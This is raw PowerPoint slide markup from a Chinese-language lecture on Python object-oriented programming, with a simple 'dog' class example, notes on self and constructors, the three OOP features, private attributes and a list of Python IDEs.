              <a:t>pythoncom.PumpMessages()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8" y="126993"/>
            <a:ext cx="650289" cy="5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28957"/>
            <a:ext cx="334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面向对象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63799" y="1096938"/>
            <a:ext cx="7122999" cy="2724150"/>
            <a:chOff x="1082849" y="1096938"/>
            <a:chExt cx="7122999" cy="2724150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 2" descr="牛皮纸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" t="3812" r="3680" b="4240"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3963169" y="1100386"/>
              <a:ext cx="4242679" cy="2448272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4926088" y="1241184"/>
              <a:ext cx="252028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en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>OOP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>概念</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p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latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>继承</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p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latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>封装</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p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latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>多态</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p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latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>数据持久化</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49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6884"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1082849" y="1096938"/>
              <a:ext cx="1950009" cy="272415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955057" y="1144151"/>
              <a:ext cx="738664" cy="24045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我是旺财</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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  <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"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    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"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一个神奇的对象！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2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面向对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="915566"/>
            <a:ext cx="8280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面向过程：根据业务逻辑从上到下写垒代码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函数式：将某功能代码封装到函数中，日后便无需重复编写，仅调用函数即可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面向对象：对函数进行分类和封装，让开发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"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更快更好更强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..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/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atinLnBrk="1"/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面向过程编程最易被初学者接受，其往往用一长段代码来实现指定功能，开发过程中最常见的操作就是粘贴复制，即：将之前实现的代码块复制到现需功能处。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1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面向对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217006" y="658961"/>
            <a:ext cx="86754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什么是对象？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PYTHON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>一切皆对象，对象包含了数据（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）和操作数据的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(methods)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zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>类是模板，对象是根据模板创建的实例，通过实例执行类中的函数。</a:t>
            </a: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539552" y="1345200"/>
            <a:ext cx="3312368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一切皆对象！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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例如：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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</a:rPr>
              <a:t>199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String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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin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</a:rPr>
              <a:t>[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M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, 0, 3.1, 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is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</a:rPr>
              <a:t>{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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>:1, 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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> : 2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122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 err="1">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> f(): &amp;&amp; x = f()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</a:rPr>
              <a:t>import module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</a:rPr>
              <a:t>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楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>class ...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499992" y="1342353"/>
            <a:ext cx="3240360" cy="1373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什么是类及其实例？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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例如：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>狗是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>旺财</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>就是狗这个类的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>instance</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:latin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楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>一个类可以有无数个实例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9" b="4003"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599618" y="2715766"/>
            <a:ext cx="266429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79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类的定义和创建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262721"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="2627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4" b="6539"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226560" y="725420"/>
            <a:ext cx="4171826" cy="205224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0" y="707424"/>
            <a:ext cx="4464496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class dog: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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __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init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__(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self,weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"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self.mouth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "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WCMouth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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self.weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = " weight"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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bark(self):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print "%s %s WANG WANG"%(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self.weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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self.mouth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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...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help(dog);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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(dog)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wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = dog("50kg");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help(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wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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wangcai.bark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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dog.bark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; 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dog.bark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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283586" y="3089489"/>
            <a:ext cx="8229600" cy="171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sz="1400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>说明：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+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类定义需要指定构造方法 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>__()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = dog() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时实际上是执行了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dog.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>__(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty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200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>！ 否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>？</a:t>
            </a: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调用父类的或者什么也不做，类的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__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ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dict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__</a:t>
            </a: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属性为空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+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有的方法必须指定一个默认的参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作为第一个参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>否则？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提示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takes no arguments (1 given)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="120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latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类定义本身也是对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，因此可直接调用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dog.bark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t>wangcai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1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+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在类中对自身属性的引用必须显式的使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>self  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>否则？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提示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name is</a:t>
            </a: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ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>not defined</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7834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4225" y="182386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开发工具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0" y="699542"/>
            <a:ext cx="2178075" cy="1493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70" y="682631"/>
            <a:ext cx="2003425" cy="15974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7" y="2787775"/>
            <a:ext cx="2072878" cy="14583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5029" y="2193079"/>
            <a:ext cx="156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Pycharm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646327" y="2280090"/>
            <a:ext cx="156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Sublime Text3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4886" y="4349917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WingIDE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829570" y="4349917"/>
            <a:ext cx="12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VS + PTVS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12" y="699542"/>
            <a:ext cx="1972604" cy="156363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466018" y="2245102"/>
            <a:ext cx="199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Eclipse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pydev</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="http://cms.csdnimg.cn/article/201307/04/51d4e0d941d31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12" y="2851087"/>
            <a:ext cx="1972603" cy="13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280" y="2851087"/>
            <a:ext cx="2034815" cy="139503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01280" y="4263117"/>
            <a:ext cx="199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Anaconda3+spyder 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0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4" y="163892"/>
            <a:ext cx="3925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OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三大特性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封装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>继承、多态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213964" y="575731"/>
            <a:ext cx="8472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封装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encapsulation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就是把对象的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成员属性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成员方法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结合成一个独立的相同单位，并尽可能隐蔽对象的内部细节，这种把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成员变量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成员函数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封装在一起的编程特性称为封装。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333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dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333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封装的好处是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、良好的封装能够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减少耦合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b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、类内部的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结构可以自由修改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b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、可以对成员进行更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精确的控制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b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隐藏实现细节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中默认的成员函数，成员变量都是公开的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而且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中没有类似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等关键词来修饰成员函数，成员变量。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中定义私有变量只需要在变量名或函数名前加上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"__"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两个下划线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，那么这个函数或变量就会为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私有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的了。</a:t>
            </a:r>
          </a:p>
          <a:p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4" y="163892"/>
            <a:ext cx="3925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OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三大特性封装、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>继承、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>多态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
